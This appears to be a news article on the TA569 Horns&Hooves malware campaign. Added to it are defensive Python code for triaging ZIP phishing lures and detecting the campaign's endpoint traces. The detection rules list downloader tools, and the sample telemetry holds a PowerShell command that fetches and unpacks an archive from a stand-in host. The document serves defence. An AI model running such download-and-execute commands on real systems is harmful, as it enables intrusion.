
Sophisticated Horns&Hooves malware targets Russian businesses


A malware campaign by the cyber gang TA569, named Horns&Hooves, has been targeting private users, retailers, and service businesses in Russia since March 2023. The campaign uses cleverly disguised malicious scripts in ZIP archives sent through phishing emails that appear to be legitimate business correspondence, with attachment names that mimic price requests, proposals, and refund claims.

The initial phase in April and May 2023 involved scripts with the HTA extension. These scripts, disguised as purchase requests, downloaded a decoy PNG document (a screenshot of the purchase table) and installed the legitimate but abused NetSupport Manager (NSM) remote administration tool, dubbed NetSupport RAT in this malicious context.

The attackers downloaded utilities like ‘bitsadmin,’ which they likely used to conceal payloads embedded within the file.

[Figure: Version A attack chain. Source: Securelist]

By mid-May 2023, researchers discovered that the attackers transitioned to JavaScript (JS) files, embedding malicious code within legitimate-looking Next.js library scripts. The infection chain remained similar but introduced intermediate scripts and TXT decoy documents with meaningless text, signalling early testing of new bait formats.
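The lure described above is a ZIP attachment carrying an HTA or JS script, later with a whole archive embedded in the script. The following mail-gateway triage routine is an added example, not code from the article or from Securelist: it builds a constructed lure archive in memory and flags script entries, double extensions such as `.pdf.js`, nested archives, and script files that carry an embedded ZIP (raw `PK\x03\x04` magic, or its base64 prefix `UEsDB`, which is a heuristic that assumes the archive starts at a base64 boundary). All file names and contents are constructed for the example.

```python
import base64
import io
import re
import zipfile

# Script types the campaign is reported to deliver inside ZIP lures.
SCRIPT_EXTENSIONS = {".hta", ".js", ".jse", ".vbs", ".vbe", ".wsf", ".bat", ".cmd", ".ps1"}
# Document-looking tokens used to spot "invoice.pdf.js"-style double extensions.
DOCUMENT_TOKENS = {"pdf", "doc", "docx", "xls", "xlsx", "rtf"}
ZIP_MAGIC = b"PK\x03\x04"
# base64("PK\x03\x04") == "UEsDBA==", so a ZIP embedded at a base64 boundary starts "UEsDB".
EMBEDDED_ZIP_B64 = re.compile(rb"UEsDB[A-Za-z0-9+/]{20,}")


def _extension(basename):
    return basename[basename.rfind("."):] if "." in basename else ""


def triage_zip(data, max_read=5_000_000):
    """Return a list of {name, reasons} for every suspicious entry in the ZIP bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            base = info.filename.rsplit("/", 1)[-1].lower()
            ext = _extension(base)
            reasons = []
            if ext in SCRIPT_EXTENSIONS:
                reasons.append("script-attachment:" + ext)
                tokens = base.split(".")
                if len(tokens) > 2 and tokens[-2] in DOCUMENT_TOKENS:
                    reasons.append("double-extension")
                if info.file_size <= max_read:
                    content = zf.read(info)
                    # Archive magic anywhere past offset 0, or its base64 form, means
                    # the script is carrying a payload archive of its own.
                    if ZIP_MAGIC in content[1:] or EMBEDDED_ZIP_B64.search(content):
                        reasons.append("embedded-archive")
            elif ext == ".zip":
                reasons.append("nested-archive")
            if reasons:
                findings.append({"name": info.filename, "reasons": reasons})
    return findings


def verdict(findings):
    """Gateway decision: quarantine anything with at least one finding."""
    return "quarantine" if findings else "deliver"


def build_sample_lure():
    """Constructed sample lure (not a real sample) imitating the reported patterns."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("tool.bin", b"\x00" * 64)  # stand-in for a bundled payload
    script = (b"/* next.js library */\nvar data = '"
              + base64.b64encode(inner.getvalue()) + b"';\n")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("Price request.hta", "<html><script>/* constructed */</script></html>")
        z.writestr("next.js", script)
        z.writestr("Proposal.pdf.js", "// constructed stub")
        z.writestr("notes.txt", "meaningless decoy text")
    return outer.getvalue()


if __name__ == "__main__":
    hits = triage_zip(build_sample_lure())
    for hit in hits:
        print(hit["name"], "->", ", ".join(hit["reasons"]))
    print("verdict:", verdict(hits))
```

The check is cheap enough to run inline on every inbound ZIP; the size cap keeps a large nested archive from being fully read at the gateway, and entries over the cap can be routed to sandboxing instead.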

Files were downloaded to directories such as %APPDATA%\EdgeCriticalUpdateService, demonstrating increased sophistication.

Another iteration in May 2023 swapped NetSupport RAT for BurnsRAT, leveraging DLL side-loading through legitimate tools like ‘Silverlight.Configuration.exe.’ The attackers incorporated RDP Wrapper, enabling enhanced remote desktop features.

This version notably introduced more plausible decoy documents generated via screenshot-to-text conversion.

Late May 2023 saw a significant rewrite to the BAT installation script. Instead of downloading individual payload components, this version used a PowerShell script to fetch and unpack an archive containing the NetSupport RAT. This streamlined approach hinted at the attackers’ efforts to reduce detection risks.
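The three stages just described leave distinct endpoint traces: a script host launching a downloader, a PowerShell command that both fetches and unpacks an archive, binaries written under a user-writable directory such as the %APPDATA% path named above, and a side-loading host like Silverlight.Configuration.exe loading an unsigned DLL from such a directory. The detection logic below is an added example, not code from the article or from Securelist; the event records, their field names (`type`, `parent`, `image`, `cmdline`, `path`, `loaded`, `signed`) and the keyword lists are constructed assumptions in the shape of Sysmon-style telemetry, to be mapped onto whatever your EDR emits.

```python
import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
DOWNLOADERS = {"powershell.exe", "bitsadmin.exe", "curl.exe", "certutil.exe"}
SIDELOAD_HOSTS = {"silverlight.configuration.exe"}  # legitimate EXE reported as a side-loading host
FETCH_WORDS = ("invoke-webrequest", "iwr ", "downloadfile", "start-bitstransfer")
UNPACK_WORDS = ("expand-archive", "zipfile", "extracttodirectory")


def _basename(path):
    return ntpath.basename(path).lower()


def _user_writable(path):
    p = path.lower()
    return "\\appdata\\" in p or "\\temp\\" in p or "\\users\\public\\" in p


def analyze(events):
    """Run the four rules over a list of event dicts; return (event id, rule) pairs."""
    alerts = []
    for ev in events:
        kind = ev["type"]
        if kind == "process":
            parent = _basename(ev["parent"])
            image = _basename(ev["image"])
            cmd = ev.get("cmdline", "").lower()
            # Rule 1: HTA/JS/BAT stage handing off to a downloader.
            if parent in SCRIPT_HOSTS and image in DOWNLOADERS:
                alerts.append((ev["id"], "script-host-launched-downloader"))
            # Rule 2: one PowerShell command that fetches and unpacks an archive.
            if (image == "powershell.exe"
                    and any(w in cmd for w in FETCH_WORDS)
                    and any(w in cmd for w in UNPACK_WORDS)):
                alerts.append((ev["id"], "powershell-fetch-and-unpack"))
        elif kind == "file_create":
            # Rule 3: executable content dropped under a user-writable path by a script or downloader.
            if (_user_writable(ev["path"])
                    and _basename(ev["path"]).endswith((".exe", ".dll"))
                    and _basename(ev["image"]) in SCRIPT_HOSTS | DOWNLOADERS):
                alerts.append((ev["id"], "binary-dropped-in-user-writable-dir"))
        elif kind == "image_load":
            # Rule 4: known side-loading host pulling an unsigned DLL from a user-writable path.
            if (_basename(ev["image"]) in SIDELOAD_HOSTS
                    and _user_writable(ev["loaded"])
                    and not ev.get("signed", True)):
                alerts.append((ev["id"], "dll-sideload-from-user-writable-dir"))
    return alerts


# Constructed telemetry; paths and names are illustrative, not observed indicators.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROP_DIR = r"C:\Users\Alice\AppData\Roaming\EdgeCriticalUpdateService"
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "parent": r"C:\Windows\System32\wscript.exe", "image": PS,
     "cmdline": "powershell -w hidden Invoke-WebRequest http://example.invalid/u.zip "
                "-OutFile u.zip; Expand-Archive u.zip"},
    {"id": 2, "type": "file_create", "image": PS, "path": DROP_DIR + r"\remote_tool.exe"},
    {"id": 3, "type": "image_load", "image": DROP_DIR + r"\Silverlight.Configuration.exe",
     "loaded": DROP_DIR + r"\helper.dll", "signed": False},
    {"id": 4, "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    {"id": 5, "type": "file_create", "image": r"C:\Windows\explorer.exe",
     "path": r"C:\Users\Alice\AppData\Roaming\notes.txt"},
]

if __name__ == "__main__":
    for event_id, rule in analyze(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

Each rule fires on its own, so a single event in a quiet environment is only a lead; the value is in the chain, and correlating rules 1 through 4 on one host within a short window is what separates this pattern from an administrator unpacking a tool by hand.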

[Figure: An example of the malicious emails. Source: Securelist]

Researchers observed that starting in June 2023, the attackers embedded the entire NetSupport RAT ZIP archive within the malicious script, simplifying the infection chain. By September 2023, the payloads were split across multiple archives, and by early 2024, bait files had transitioned from plain text to more convincing PDF documents.

The campaign’s use of specific configuration keys and license files links it strongly to the TA569 group (Mustard Tempest or Gold Prelude). The Gateway Security Key (GSK) field confirmed the connection, indicating a shared infrastructure and operational framework.

Installing NetSupport RAT or BurnsRAT gives the attackers remote access, which serves as a stepping stone for further compromise. Observed follow-on activity includes the deployment of the Rhadamanthys and Meduza stealers and of ransomware. TA569 reportedly monetises access by selling compromised systems to other cybercriminal groups, amplifying the potential risk to victims.


Kumar Hemant


Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me
